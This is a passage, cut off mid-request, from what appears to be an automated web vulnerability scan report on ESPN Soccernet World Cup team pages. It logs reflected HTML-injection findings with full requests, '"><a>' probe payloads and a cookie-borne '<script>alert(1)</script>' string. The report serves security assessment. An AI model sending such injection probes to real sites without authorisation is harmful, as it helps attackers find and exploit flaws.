HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:12:31 GMT Content-Length: 82120 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Australia Football ...[SNIP]... <a href="/worldcup2010/team?team=628&f41f3"><a>62eb963c13c=1&_slug_=australia&f41f3"> ...[SNIP]...
2.57. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/656/cameroon
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1812"><a>6cd9474c3cf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroond1812"><a>6cd9474c3cf HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:15 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:13:15 GMT Content-Length: 81962 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&_slug_=cameroond1812"><a>6cd9474c3cf&topId=801800&linktext=Cameroon+coach+Le+Guen+quits+after+loss"> ...[SNIP]...
2.58. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/656/cameroon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c3a"><a>f85413ba34c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroon?74c3a"><a>f85413ba34c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:27 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:27 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:12:27 GMT Content-Length: 82070 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cameroon Football / ...[SNIP]... <a href="/worldcup2010/team?team=656&74c3a"><a>f85413ba34c=1&_slug_=cameroon&74c3a"> ...[SNIP]...
2.59. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/657/nigeria
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf86"><a>41113cade21 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria2cf86"><a>41113cade21 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:33:33 GMT Content-Length: 81727 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&_slug_=nigeria2cf86"><a>41113cade21&topId=792890&linktext=Nigerian+goverment+won%27t+ban+team"> ...[SNIP]...
2.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/657/nigeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac97"><a>0764b8f72c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria?8ac97"><a>0764b8f72c=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:25:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:25:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 23:30:13 GMT Content-Length: 81827 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nigeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=657&8ac97"><a>0764b8f72c=1&_slug_=nigeria&8ac97"> ...[SNIP]...
2.61. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/660/united-states
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac12"><a>f4a7d4b1647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-statesbac12"><a>f4a7d4b1647 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:34:25 GMT
Content-Length: 82134
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]...
<a href="/worldcup2010/team?team=660&_slug_=united-statesbac12"><a>f4a7d4b1647&topId=802760&linktext=Ghana+advance+after+beating+USA+2-1"> ...[SNIP]...
2.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/660/united-states
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e57e"><a>f7a6114e7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-states?3e57e"><a>f7a6114e7ef=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:33:55 GMT
Content-Length: 82242
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]...
<a href="/worldcup2010/team?team=660&3e57e"><a>f7a6114e7ef=1&_slug_=united-states&3e57e"> ...[SNIP]...
2.63. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/6757/serbia
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70663"><a>50054d97128 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia70663"><a>50054d97128 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:19 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:33:19 GMT
Content-Length: 81915
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]...
<a href="/worldcup2010/team?team=6757&_slug_=serbia70663"><a>50054d97128&topId=797998&linktext=Serbia+coach+Radomir+Antic+wants+to+stay"> ...[SNIP]...
2.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/6757/serbia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ccb"><a>dea0025a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia?82ccb"><a>dea0025a04=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
